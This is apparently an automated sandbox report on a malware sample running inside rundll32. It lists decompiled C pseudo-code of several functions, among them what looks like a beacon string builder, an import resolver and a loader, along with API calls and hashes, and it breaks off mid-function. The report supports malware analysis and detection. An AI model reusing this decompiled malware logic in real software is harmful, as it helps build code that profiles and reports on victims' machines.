                                                  • Opcode Fuzzy Hash: 6268781f871a6819fd876720e906aeba8634e5cf4beda0ea0473a00730d84441
                                                  • Instruction Fuzzy Hash: AB61A871922601AFC7219BA8FC4EF6ABFE8EF48321F154014F909D72A1DB25E805DB71
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 052D8B94, Relevance: 33.2, APIs: 22, Instructions: 245memorystringCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 74%
                                                  			E052D8B94(long __eax, void* __ecx, void* __edx, intOrPtr _a4, char** _a8, int* _a12, void* _a16) {
				void* _v8;
				signed int _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				void* _v28;
				void* __ebx;
				void* __edi;
				long _t59;
				intOrPtr _t60;
				intOrPtr _t61;
				intOrPtr _t62;
				intOrPtr _t63;
				intOrPtr _t64;
				void* _t67;
				intOrPtr _t68;
				int _t71;
				void* _t72;
				void* _t73;
				void* _t75;
				void* _t78;
				intOrPtr _t82;
				intOrPtr _t86;
				intOrPtr* _t88;
				void* _t94;
				intOrPtr _t101;
				signed int _t105;
				char** _t107;
				int _t110;
				intOrPtr* _t113;
				intOrPtr* _t115;
				intOrPtr* _t117;
				intOrPtr* _t119;
				intOrPtr _t122;
				intOrPtr _t127;
				int _t131;
				CHAR* _t133;
				intOrPtr _t134;
				void* _t135;
				void* _t144;
				int _t145;
				void* _t146;
				intOrPtr _t147;
				void* _t149;
				long _t153;
				intOrPtr* _t154;
				intOrPtr* _t155;
				intOrPtr* _t158;
				void* _t159;
				void* _t161;

				_t144 = __edx;
				_t135 = __ecx;
				_t59 = __eax;
				_v12 = 8;
				if(__eax == 0) {
					_t59 = GetTickCount();
				}
				_t60 =  *0x52dd018; // 0xf56cfa1f
				asm("bswap eax");
				_t61 =  *0x52dd014; // 0x3a87c8cd
				_t133 = _a16;
				asm("bswap eax");
				_t62 =  *0x52dd010; // 0xd8d2f808
				asm("bswap eax");
				_t63 =  *0x52dd00c; // 0x8f8f86c2
				asm("bswap eax");
				_t64 =  *0x52dd27c; // 0x202a5a8
				_t3 = _t64 + 0x52de633; // 0x74666f73
				_t145 = wsprintfA(_t133, _t3, 3, 0x3d14b, _t63, _t62, _t61, _t60,  *0x52dd02c,  *0x52dd004, _t59);
				_t67 = E052D1C1A();
				_t68 =  *0x52dd27c; // 0x202a5a8
				_t4 = _t68 + 0x52de673; // 0x74707526
				_t71 = wsprintfA(_t145 + _t133, _t4, _t67);
				_t161 = _t159 + 0x38;
				_t146 = _t145 + _t71;
				_t72 = E052D54BC(_t135);
				_t134 = __imp__;
				_v8 = _t72;
				if(_t72 != 0) {
					_t127 =  *0x52dd27c; // 0x202a5a8
					_t7 = _t127 + 0x52de8eb; // 0x736e6426
					_t131 = wsprintfA(_a16 + _t146, _t7, _t72);
					_t161 = _t161 + 0xc;
					_t146 = _t146 + _t131;
					HeapFree( *0x52dd238, 0, _v8);
				}
				_t73 = E052D7649();
				_v8 = _t73;
				if(_t73 != 0) {
					_t122 =  *0x52dd27c; // 0x202a5a8
					_t11 = _t122 + 0x52de8f3; // 0x6f687726
					wsprintfA(_t146 + _a16, _t11, _t73);
					_t161 = _t161 + 0xc;
					HeapFree( *0x52dd238, 0, _v8);
				}
				_t147 =  *0x52dd32c; // 0x73095b0
				_t75 = E052D9395(0x52dd00a, _t147 + 4);
				_t153 = 0;
				_v20 = _t75;
				if(_t75 == 0) {
					L26:
					HeapFree( *0x52dd238, _t153, _a16);
					return _v12;
				} else {
					_t78 = RtlAllocateHeap( *0x52dd238, 0, 0x800);
					_v8 = _t78;
					if(_t78 == 0) {
						L25:
						HeapFree( *0x52dd238, _t153, _v20);
						goto L26;
					}
					E052D7A80(GetTickCount());
					_t82 =  *0x52dd32c; // 0x73095b0
					__imp__(_t82 + 0x40);
					asm("lock xadd [eax], ecx");
					_t86 =  *0x52dd32c; // 0x73095b0
					__imp__(_t86 + 0x40);
					_t88 =  *0x52dd32c; // 0x73095b0
					_t149 = E052D8307(1, _t144, _a16,  *_t88);
					_v28 = _t149;
					asm("lock xadd [eax], ecx");
					if(_t149 == 0) {
						L24:
						HeapFree( *0x52dd238, _t153, _v8);
						goto L25;
					}
					StrTrimA(_t149, 0x52dc2ac);
					_push(_t149);
					_t94 = E052D3CC8();
					_v16 = _t94;
					if(_t94 == 0) {
						L23:
						HeapFree( *0x52dd238, _t153, _t149);
						goto L24;
					}
					_t154 = __imp__;
					 *_t154(_t149, _a4);
					 *_t154(_v8, _v20);
					_t155 = __imp__;
					 *_t155(_v8, _v16);
					 *_t155(_v8, _t149);
					_t101 = E052D809F(0, _v8);
					_a4 = _t101;
					if(_t101 == 0) {
						_v12 = 8;
						L21:
						E052DA1B0();
						L22:
						HeapFree( *0x52dd238, 0, _v16);
						_t153 = 0;
						goto L23;
					}
					_t105 = E052D43DF(_t134, 0xffffffffffffffff, _t149,  &_v24);
					_v12 = _t105;
					if(_t105 == 0) {
						_t158 = _v24;
						_v12 = E052D163F(_t158, _a4, _a8, _a12);
						_t113 =  *((intOrPtr*)(_t158 + 8));
						 *((intOrPtr*)( *_t113 + 0x80))(_t113);
						_t115 =  *((intOrPtr*)(_t158 + 8));
						 *((intOrPtr*)( *_t115 + 8))(_t115);
						_t117 =  *((intOrPtr*)(_t158 + 4));
						 *((intOrPtr*)( *_t117 + 8))(_t117);
						_t119 =  *_t158;
						 *((intOrPtr*)( *_t119 + 8))(_t119);
						E052D9039(_t158);
					}
					if(_v12 != 0x10d2) {
						L16:
						if(_v12 == 0) {
							_t107 = _a8;
							if(_t107 != 0) {
								_t150 =  *_t107;
								_t156 =  *_a12;
								wcstombs( *_t107,  *_t107,  *_a12);
								_t110 = E052D85DB(_t150, _t150, _t156 >> 1);
								_t149 = _v28;
								 *_a12 = _t110;
							}
						}
						goto L19;
					} else {
						if(_a8 != 0) {
							L19:
							E052D9039(_a4);
							if(_v12 == 0 || _v12 == 0x10d2) {
								goto L22;
							} else {
								goto L21;
							}
						}
						_v12 = _v12 & 0x00000000;
						goto L16;
					}
				}
			}





















































                                                  0x052d8b94
                                                  0x052d8b94
                                                  0x052d8b94
                                                  0x052d8b9f
                                                  0x052d8ba6
                                                  0x052d8ba8
                                                  0x052d8ba8
                                                  0x052d8bb5
                                                  0x052d8bc0
                                                  0x052d8bc3
                                                  0x052d8bc8
                                                  0x052d8bd1
                                                  0x052d8bd4
                                                  0x052d8bd9
                                                  0x052d8bdc
                                                  0x052d8be1
                                                  0x052d8be4
                                                  0x052d8bf0
                                                  0x052d8bfd
                                                  0x052d8bff
                                                  0x052d8c05
                                                  0x052d8c0a
                                                  0x052d8c15
                                                  0x052d8c17
                                                  0x052d8c1a
                                                  0x052d8c1c
                                                  0x052d8c23
                                                  0x052d8c29
                                                  0x052d8c2c
                                                  0x052d8c2f
                                                  0x052d8c34
                                                  0x052d8c41
                                                  0x052d8c43
                                                  0x052d8c49
                                                  0x052d8c53
                                                  0x052d8c53
                                                  0x052d8c55
                                                  0x052d8c5c
                                                  0x052d8c5f
                                                  0x052d8c62
                                                  0x052d8c67
                                                  0x052d8c74
                                                  0x052d8c76
                                                  0x052d8c84
                                                  0x052d8c84
                                                  0x052d8c86
                                                  0x052d8c94
                                                  0x052d8c99
                                                  0x052d8c9d
                                                  0x052d8ca0
                                                  0x052d8e63
                                                  0x052d8e6d
                                                  0x052d8e76
                                                  0x052d8ca6
                                                  0x052d8cb2
                                                  0x052d8cba
                                                  0x052d8cbd
                                                  0x052d8e57
                                                  0x052d8e61
                                                  0x00000000
                                                  0x052d8e61
                                                  0x052d8cc9
                                                  0x052d8cce
                                                  0x052d8cd7
                                                  0x052d8ce8
                                                  0x052d8cec
                                                  0x052d8cf5
                                                  0x052d8cfb
                                                  0x052d8d0a
                                                  0x052d8d11
                                                  0x052d8d1a
                                                  0x052d8d20
                                                  0x052d8e4b
                                                  0x052d8e55
                                                  0x00000000
                                                  0x052d8e55
                                                  0x052d8d2c
                                                  0x052d8d32
                                                  0x052d8d33
                                                  0x052d8d3a
                                                  0x052d8d3d
                                                  0x052d8e41
                                                  0x052d8e49
                                                  0x00000000
                                                  0x052d8e49
                                                  0x052d8d46
                                                  0x052d8d4d
                                                  0x052d8d55
                                                  0x052d8d5a
                                                  0x052d8d63
                                                  0x052d8d69
                                                  0x052d8d70
                                                  0x052d8d77
                                                  0x052d8d7a
                                                  0x052d8e79
                                                  0x052d8e2d
                                                  0x052d8e2d
                                                  0x052d8e32
                                                  0x052d8e3d
                                                  0x052d8e3f
                                                  0x00000000
                                                  0x052d8e3f
                                                  0x052d8d84
                                                  0x052d8d8b
                                                  0x052d8d8e
                                                  0x052d8d93
                                                  0x052d8da3
                                                  0x052d8da6
                                                  0x052d8dac
                                                  0x052d8db2
                                                  0x052d8db8
                                                  0x052d8dbb
                                                  0x052d8dc1
                                                  0x052d8dc4
                                                  0x052d8dc9
                                                  0x052d8dcd
                                                  0x052d8dcd
                                                  0x052d8dd9
                                                  0x052d8de5
                                                  0x052d8de9
                                                  0x052d8deb
                                                  0x052d8df0
                                                  0x052d8df2
                                                  0x052d8df7
                                                  0x052d8dfc
                                                  0x052d8e09
                                                  0x052d8e11
                                                  0x052d8e14
                                                  0x052d8e14
                                                  0x052d8df0
                                                  0x00000000
                                                  0x052d8ddb
                                                  0x052d8ddf
                                                  0x052d8e16
                                                  0x052d8e19
                                                  0x052d8e22
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x052d8e22
                                                  0x052d8de1
                                                  0x00000000
                                                  0x052d8de1
                                                  0x052d8dd9

                                                  APIs
                                                  • GetTickCount.KERNEL32 ref: 052D8BA8
                                                  • wsprintfA.USER32 ref: 052D8BF8
                                                  • wsprintfA.USER32 ref: 052D8C15
                                                  • wsprintfA.USER32 ref: 052D8C41
                                                  • HeapFree.KERNEL32(00000000,?), ref: 052D8C53
                                                  • wsprintfA.USER32 ref: 052D8C74
                                                  • HeapFree.KERNEL32(00000000,?), ref: 052D8C84
                                                  • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 052D8CB2
                                                  • GetTickCount.KERNEL32 ref: 052D8CC3
                                                  • RtlEnterCriticalSection.NTDLL(07309570), ref: 052D8CD7
                                                  • RtlLeaveCriticalSection.NTDLL(07309570), ref: 052D8CF5
                                                    • Part of subcall function 052D8307: lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,74ECC740,?,?,052DA428,?,073095B0), ref: 052D8332
                                                    • Part of subcall function 052D8307: lstrlen.KERNEL32(?,?,?,052DA428,?,073095B0), ref: 052D833A
                                                    • Part of subcall function 052D8307: strcpy.NTDLL ref: 052D8351
                                                    • Part of subcall function 052D8307: lstrcat.KERNEL32(00000000,?), ref: 052D835C
                                                    • Part of subcall function 052D8307: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,052DA428,?,073095B0), ref: 052D8379
                                                  • StrTrimA.SHLWAPI(00000000,052DC2AC,?,073095B0), ref: 052D8D2C
                                                    • Part of subcall function 052D3CC8: lstrlen.KERNEL32(073087FA,00000000,00000000,74ECC740,052DA453,00000000), ref: 052D3CD8
                                                    • Part of subcall function 052D3CC8: lstrlen.KERNEL32(?), ref: 052D3CE0
                                                    • Part of subcall function 052D3CC8: lstrcpy.KERNEL32(00000000,073087FA), ref: 052D3CF4
                                                    • Part of subcall function 052D3CC8: lstrcat.KERNEL32(00000000,?), ref: 052D3CFF
                                                  • lstrcpy.KERNEL32(00000000,?), ref: 052D8D4D
                                                  • lstrcpy.KERNEL32(?,?), ref: 052D8D55
                                                  • lstrcat.KERNEL32(?,?), ref: 052D8D63
                                                  • lstrcat.KERNEL32(?,00000000), ref: 052D8D69
                                                    • Part of subcall function 052D809F: lstrlen.KERNEL32(?,00000000,052DD330,00000001,052D2200,052DD00C,052DD00C,00000000,00000005,00000000,00000000,?,?,?,052D96C1,052D23E9), ref: 052D80A8
                                                    • Part of subcall function 052D809F: mbstowcs.NTDLL ref: 052D80CF
                                                    • Part of subcall function 052D809F: memset.NTDLL ref: 052D80E1
                                                  • wcstombs.NTDLL ref: 052D8DFC
                                                    • Part of subcall function 052D163F: SysAllocString.OLEAUT32(?), ref: 052D1680
                                                    • Part of subcall function 052D9039: HeapFree.KERNEL32(00000000,00000000,052D7F18,00000000,?,?,00000000), ref: 052D9045
                                                  • HeapFree.KERNEL32(00000000,?,?), ref: 052D8E3D
                                                  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 052D8E49
                                                  • HeapFree.KERNEL32(00000000,?,?,073095B0), ref: 052D8E55
                                                  • HeapFree.KERNEL32(00000000,?), ref: 052D8E61
                                                  • HeapFree.KERNEL32(00000000,?), ref: 052D8E6D
                                                  Memory Dump Source
                                                  • Source File: 0000001D.00000002.379296556.00000000052D1000.00000020.00020000.sdmp, Offset: 052D0000, based on PE: true
                                                  • Associated: 0000001D.00000002.379282965.00000000052D0000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000001D.00000002.379323121.00000000052DC000.00000002.00020000.sdmp Download File
                                                  • Associated: 0000001D.00000002.379335669.00000000052DD000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000001D.00000002.379354513.00000000052DF000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_29_2_52d0000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: Heap$Free$lstrlen$lstrcatwsprintf$lstrcpy$CountCriticalSectionTickTrim$AllocAllocateEnterLeaveStringmbstowcsmemsetstrcpywcstombs
                                                  • String ID:
                                                  • API String ID: 3748877296-0
                                                  • Opcode ID: 16b1cd24a3c71a7cef9dcd08d421b1d3add5130276369ea2765b2d547d2329e6
                                                  • Instruction ID: 4b8632ad8e9b82da67adb427685a443ae12e14b40d22ed70a087c3810820a51e
                                                  • Opcode Fuzzy Hash: 16b1cd24a3c71a7cef9dcd08d421b1d3add5130276369ea2765b2d547d2329e6
                                                  • Instruction Fuzzy Hash: BC913971911209AFCB11DFA8EC89AAABFB9EF48361F144055F809E72A0DB31D951DF70
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 052DADE5, Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 209libraryCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 51%
                                                  			E052DADE5(long _a4, long _a8) {
				signed int _v8;
				intOrPtr _v16;
				LONG* _v28;
				long _v40;
				long _v44;
				long _v48;
				CHAR* _v52;
				long _v56;
				CHAR* _v60;
				long _v64;
				signed int* _v68;
				char _v72;
				signed int _t76;
				signed int _t80;
				signed int _t81;
				intOrPtr* _t82;
				intOrPtr* _t83;
				intOrPtr* _t85;
				intOrPtr* _t90;
				intOrPtr* _t95;
				intOrPtr* _t98;
				void* _t102;
				intOrPtr* _t104;
				void* _t115;
				long _t116;
				void _t125;
				void* _t131;
				signed short _t133;
				struct HINSTANCE__* _t138;
				signed int* _t139;

				_t139 = _a4;
				_v28 = _t139[2] + 0x52d0000;
				_t115 = _t139[3] + 0x52d0000;
				_t131 = _t139[4] + 0x52d0000;
				_v8 = _t139[7];
				_v60 = _t139[1] + 0x52d0000;
				_v16 = _t139[5] + 0x52d0000;
				_v64 = _a8;
				_v72 = 0x24;
				_v68 = _t139;
				_v56 = 0;
				asm("stosd");
				_v48 = 0;
				_v44 = 0;
				_v40 = 0;
				if(( *_t139 & 0x00000001) == 0) {
					_a8 =  &_v72;
					RaiseException(0xc06d0057, 0, 1,  &_a8);
					return 0;
				}
				_t138 =  *_v28;
				_t76 = _a8 - _t115 >> 2 << 2;
				_t133 =  *(_t131 + _t76);
				_a4 = _t76;
				_t80 =  !(_t133 >> 0x1f) & 0x00000001;
				_v56 = _t80;
				_t81 = _t133 + 0x52d0002;
				if(_t80 == 0) {
					_t81 = _t133 & 0x0000ffff;
				}
				_v52 = _t81;
				_t82 =  *0x52dd1a0; // 0x0
				_t116 = 0;
				if(_t82 == 0) {
					L6:
					if(_t138 != 0) {
						L18:
						_t83 =  *0x52dd1a0; // 0x0
						_v48 = _t138;
						if(_t83 != 0) {
							_t116 =  *_t83(2,  &_v72);
						}
						if(_t116 != 0) {
							L32:
							 *_a8 = _t116;
							L33:
							_t85 =  *0x52dd1a0; // 0x0
							if(_t85 != 0) {
								_v40 = _v40 & 0x00000000;
								_v48 = _t138;
								_v44 = _t116;
								 *_t85(5,  &_v72);
							}
							return _t116;
						} else {
							if(_t139[5] == _t116 || _t139[7] == _t116) {
								L27:
								_t116 = GetProcAddress(_t138, _v52);
								if(_t116 == 0) {
									_v40 = GetLastError();
									_t90 =  *0x52dd19c; // 0x0
									if(_t90 != 0) {
										_t116 =  *_t90(4,  &_v72);
									}
									if(_t116 == 0) {
										_a4 =  &_v72;
										RaiseException(0xc06d007f, _t116, 1,  &_a4);
										_t116 = _v44;
									}
								}
								goto L32;
							} else {
								_t95 =  *((intOrPtr*)(_t138 + 0x3c)) + _t138;
								if( *_t95 == 0x4550 &&  *((intOrPtr*)(_t95 + 8)) == _v8 && _t138 ==  *((intOrPtr*)(_t95 + 0x34))) {
									_t116 =  *(_a4 + _v16);
									if(_t116 != 0) {
										goto L32;
									}
								}
								goto L27;
							}
						}
					}
					_t98 =  *0x52dd1a0; // 0x0
					if(_t98 == 0) {
						L9:
						_t138 = LoadLibraryA(_v60);
						if(_t138 != 0) {
							L13:
							if(InterlockedExchange(_v28, _t138) == _t138) {
								FreeLibrary(_t138);
							} else {
								if(_t139[6] != 0) {
									_t102 = LocalAlloc(0x40, 8);
									if(_t102 != 0) {
										 *(_t102 + 4) = _t139;
										_t125 =  *0x52dd198; // 0x0
										 *_t102 = _t125;
										 *0x52dd198 = _t102;
									}
								}
							}
							goto L18;
						}
						_v40 = GetLastError();
						_t104 =  *0x52dd19c; // 0x0
						if(_t104 == 0) {
							L12:
							_a8 =  &_v72;
							RaiseException(0xc06d007e, 0, 1,  &_a8);
							return _v44;
						}
						_t138 =  *_t104(3,  &_v72);
						if(_t138 != 0) {
							goto L13;
						}
						goto L12;
					}
					_t138 =  *_t98(1,  &_v72);
					if(_t138 != 0) {
						goto L13;
					}
					goto L9;
				}
				_t116 =  *_t82(0,  &_v72);
				if(_t116 != 0) {
					goto L33;
				}
				goto L6;
			}

































                                                  0x052dadf4
                                                  0x052dae0a
                                                  0x052dae10
                                                  0x052dae12
                                                  0x052dae17
                                                  0x052dae1d
                                                  0x052dae22
                                                  0x052dae25
                                                  0x052dae33
                                                  0x052dae3a
                                                  0x052dae3d
                                                  0x052dae40
                                                  0x052dae41
                                                  0x052dae44
                                                  0x052dae47
                                                  0x052dae4a
                                                  0x052dae4f
                                                  0x052dae5e
                                                  0x00000000
                                                  0x052dae64
                                                  0x052dae6e
                                                  0x052dae78
                                                  0x052dae7d
                                                  0x052dae7f
                                                  0x052dae89
                                                  0x052dae8c
                                                  0x052dae8f
                                                  0x052dae95
                                                  0x052dae97
                                                  0x052dae97
                                                  0x052dae9a
                                                  0x052dae9d
                                                  0x052daea2
                                                  0x052daea6
                                                  0x052daeb9
                                                  0x052daebb
                                                  0x052daf63
                                                  0x052daf63
                                                  0x052daf6a
                                                  0x052daf6d
                                                  0x052daf77
                                                  0x052daf77
                                                  0x052daf7b
                                                  0x052daff9
                                                  0x052daffc
                                                  0x052daffe
                                                  0x052daffe
                                                  0x052db005
                                                  0x052db007
                                                  0x052db011
                                                  0x052db014
                                                  0x052db017
                                                  0x052db017
                                                  0x00000000
                                                  0x052daf7d
                                                  0x052daf80
                                                  0x052dafae
                                                  0x052dafb8
                                                  0x052dafbc
                                                  0x052dafc4
                                                  0x052dafc7
                                                  0x052dafce
                                                  0x052dafd8
                                                  0x052dafd8
                                                  0x052dafdc
                                                  0x052dafe1
                                                  0x052daff0
                                                  0x052daff6
                                                  0x052daff6
                                                  0x052dafdc
                                                  0x00000000
                                                  0x052daf87
                                                  0x052daf8a
                                                  0x052daf92
                                                  0x052dafa7
                                                  0x052dafac
                                                  0x00000000
                                                  0x00000000
                                                  0x052dafac
                                                  0x00000000
                                                  0x052daf92
                                                  0x052daf80
                                                  0x052daf7b
                                                  0x052daec1
                                                  0x052daec8
                                                  0x052daed8
                                                  0x052daee1
                                                  0x052daee5
                                                  0x052daf28
                                                  0x052daf34
                                                  0x052daf5d
                                                  0x052daf36
                                                  0x052daf3a
                                                  0x052daf40
                                                  0x052daf48
                                                  0x052daf4a
                                                  0x052daf4d
                                                  0x052daf53
                                                  0x052daf55
                                                  0x052daf55
                                                  0x052daf48
                                                  0x052daf3a
                                                  0x00000000
                                                  0x052daf34
                                                  0x052daeed
                                                  0x052daef0
                                                  0x052daef7
                                                  0x052daf07
                                                  0x052daf0a
                                                  0x052daf1a
                                                  0x00000000
                                                  0x052daf20
                                                  0x052daf01
                                                  0x052daf05
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x052daf05
                                                  0x052daed2
                                                  0x052daed6
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x052daed6
                                                  0x052daeaf
                                                  0x052daeb3
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000

                                                  APIs
                                                  • RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 052DAE5E
                                                  • LoadLibraryA.KERNEL32(?), ref: 052DAEDB
                                                  • GetLastError.KERNEL32 ref: 052DAEE7
                                                  • RaiseException.KERNEL32(C06D007E,00000000,00000001,?), ref: 052DAF1A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000001D.00000002.379296556.00000000052D1000.00000020.00020000.sdmp, Offset: 052D0000, based on PE: true
                                                  • Associated: 0000001D.00000002.379282965.00000000052D0000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000001D.00000002.379323121.00000000052DC000.00000002.00020000.sdmp Download File
                                                  • Associated: 0000001D.00000002.379335669.00000000052DD000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000001D.00000002.379354513.00000000052DF000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_29_2_52d0000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: ExceptionRaise$ErrorLastLibraryLoad
                                                  • String ID: $
                                                  • API String ID: 948315288-3993045852
                                                  • Opcode ID: 17aef45074b3f28909aed6ebdd333be6747d9161352a2a0b09e8b0a3b03dded5
                                                  • Instruction ID: 79a1f8a98ccd4ac2a4a7a43b05af40a9116ce4a3152d24d8c41f78cddad12a3e
                                                  • Opcode Fuzzy Hash: 17aef45074b3f28909aed6ebdd333be6747d9161352a2a0b09e8b0a3b03dded5
                                                  • Instruction Fuzzy Hash: 228119B1A21606AFDB10CF98D885EADFBF5FF48311F148169E509E7280EB71E945CB60
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 052D816C, Relevance: 13.6, APIs: 9, Instructions: 112stringCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 27%
                                                  			E052D816C(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, intOrPtr* _a16, intOrPtr* _a20) {
				intOrPtr _v8;
				intOrPtr _v12;
				long _v16;
				intOrPtr _v20;
				signed int _v24;
				void* __esi;
				long _t43;
				intOrPtr _t44;
				intOrPtr _t46;
				void* _t48;
				void* _t49;
				void* _t50;
				intOrPtr _t54;
				intOrPtr _t57;
				void* _t58;
				void* _t59;
				void* _t60;
				intOrPtr _t66;
				void* _t71;
				void* _t74;
				intOrPtr _t75;
				void* _t77;
				intOrPtr _t79;
				intOrPtr* _t80;
				intOrPtr _t91;

				_t79 =  *0x52dd33c; // 0x7309bc8
				_v24 = 8;
				_t43 = GetTickCount();
				_push(5);
				_t74 = 0xa;
				_v16 = _t43;
				_t44 = E052D70F5(_t74,  &_v16);
				_v8 = _t44;
				if(_t44 == 0) {
					_v8 = 0x52dc1ac;
				}
				_t46 = E052D8022(_t79);
				_v12 = _t46;
				if(_t46 != 0) {
					_t80 = __imp__;
					_t48 =  *_t80(_v8, _t71);
					_t49 =  *_t80(_v12);
					_t50 =  *_t80(_a4);
					_t54 = E052D2049(lstrlenW(_a8) + _t48 + _t48 + _t49 + _t50 + lstrlenW(_a8) + _t48 + _t48 + _t49 + _t50 + 0x102);
					_v20 = _t54;
					if(_t54 != 0) {
						_t75 =  *0x52dd27c; // 0x202a5a8
						_t16 = _t75 + 0x52deb28; // 0x530025
						 *0x52dd11c(_t54, _t16, _v8, _v8, _a4, _v12, _a8);
						_push(4);
						_t77 = 5;
						_t57 = E052D70F5(_t77,  &_v16);
						_v8 = _t57;
						if(_t57 == 0) {
							_v8 = 0x52dc1b0;
						}
						_t58 =  *_t80(_v8);
						_t59 =  *_t80(_v12);
						_t60 =  *_t80(_a4);
						_t91 = E052D2049(lstrlenW(_a12) + _t58 + _t58 + _t59 + _t60 + lstrlenW(_a12) + _t58 + _t58 + _t59 + _t60 + 0x13a);
						if(_t91 == 0) {
							E052D9039(_v20);
						} else {
							_t66 =  *0x52dd27c; // 0x202a5a8
							_t31 = _t66 + 0x52dec48; // 0x73006d
							 *0x52dd11c(_t91, _t31, _v8, _v8, _a4, _v12, _a12);
							 *_a16 = _v20;
							_v24 = _v24 & 0x00000000;
							 *_a20 = _t91;
						}
					}
					E052D9039(_v12);
				}
				return _v24;
			}




























                                                  0x052d8174
                                                  0x052d817a
                                                  0x052d8181
                                                  0x052d8187
                                                  0x052d818b
                                                  0x052d818f
                                                  0x052d8192
                                                  0x052d8199
                                                  0x052d819c
                                                  0x052d819e
                                                  0x052d819e
                                                  0x052d81a7
                                                  0x052d81ae
                                                  0x052d81b1
                                                  0x052d81b7
                                                  0x052d81c1
                                                  0x052d81ca
                                                  0x052d81d1
                                                  0x052d81ea
                                                  0x052d81f1
                                                  0x052d81f4
                                                  0x052d81fd
                                                  0x052d8206
                                                  0x052d8217
                                                  0x052d8220
                                                  0x052d8224
                                                  0x052d8228
                                                  0x052d822f
                                                  0x052d8232
                                                  0x052d8234
                                                  0x052d8234
                                                  0x052d823e
                                                  0x052d8247
                                                  0x052d824e
                                                  0x052d8266
                                                  0x052d826a
                                                  0x052d82a7
                                                  0x052d826c
                                                  0x052d826f
                                                  0x052d8277
                                                  0x052d8288
                                                  0x052d8294
                                                  0x052d829c
                                                  0x052d82a0
                                                  0x052d82a0
                                                  0x052d826a
                                                  0x052d82af
                                                  0x052d82b4
                                                  0x052d82bb

                                                  APIs
                                                  • GetTickCount.KERNEL32 ref: 052D8181
                                                  • lstrlen.KERNEL32(?,80000002,00000005), ref: 052D81C1
                                                  • lstrlen.KERNEL32(00000000), ref: 052D81CA
                                                  • lstrlen.KERNEL32(00000000), ref: 052D81D1
                                                  • lstrlenW.KERNEL32(80000002), ref: 052D81DE
                                                  • lstrlen.KERNEL32(?,00000004), ref: 052D823E
                                                  • lstrlen.KERNEL32(?), ref: 052D8247
                                                  • lstrlen.KERNEL32(?), ref: 052D824E
                                                  • lstrlenW.KERNEL32(?), ref: 052D8255
                                                    • Part of subcall function 052D9039: HeapFree.KERNEL32(00000000,00000000,052D7F18,00000000,?,?,00000000), ref: 052D9045
                                                  Memory Dump Source
                                                  • Source File: 0000001D.00000002.379296556.00000000052D1000.00000020.00020000.sdmp, Offset: 052D0000, based on PE: true
                                                  • Associated: 0000001D.00000002.379282965.00000000052D0000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000001D.00000002.379323121.00000000052DC000.00000002.00020000.sdmp Download File
                                                  • Associated: 0000001D.00000002.379335669.00000000052DD000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000001D.00000002.379354513.00000000052DF000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_29_2_52d0000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: lstrlen$CountFreeHeapTick
                                                  • String ID:
                                                  • API String ID: 2535036572-0
                                                  • Opcode ID: fcc3bbccc02300355ad05fb1363663f48f7d32d0a9d8b7e4f5f8cb12312dca94
                                                  • Instruction ID: 8ac60854be0a06c0343135ffd52c3ebbfeca0293e1a7a7d5a1e54d7ee1378a2f
                                                  • Opcode Fuzzy Hash: fcc3bbccc02300355ad05fb1363663f48f7d32d0a9d8b7e4f5f8cb12312dca94
                                                  • Instruction Fuzzy Hash: 60412372D10219FBDF11AFA4DC09A9EBBB5EF48314F054061F904A7261DB369A15EBA0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 052D205E, Relevance: 10.6, APIs: 7, Instructions: 109librarymemoryloaderCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 73%
                                                  			E052D205E(void* __eax, void* __ecx) {
				long _v8;
				char _v12;
				void* _v16;
				void* _v28;
				long _v32;
				void _v104;
				char _v108;
				long _t36;
				intOrPtr _t40;
				intOrPtr _t47;
				intOrPtr _t50;
				void* _t58;
				void* _t68;
				intOrPtr* _t70;
				intOrPtr* _t71;

				_t1 = __eax + 0x14; // 0x74183966
				_t69 =  *_t1;
				_t36 = E052D692C(__ecx,  *((intOrPtr*)( *_t1 + 0xc)),  &_v12,  &_v16);
				_v8 = _t36;
				if(_t36 != 0) {
					L12:
					return _v8;
				}
				E052DA8D8( *((intOrPtr*)(_t69 + 0xc)),  *((intOrPtr*)(_t69 + 8)), _v12);
				_t40 = _v12(_v12);
				_v8 = _t40;
				if(_t40 == 0 && ( *0x52dd260 & 0x00000001) != 0) {
					_v32 = 0;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_v108 = 0;
					memset( &_v104, 0, 0x40);
					_t47 =  *0x52dd27c; // 0x202a5a8
					_t18 = _t47 + 0x52de3e6; // 0x73797325
					_t68 = E052D95B1(_t18);
					if(_t68 == 0) {
						_v8 = 8;
					} else {
						_t50 =  *0x52dd27c; // 0x202a5a8
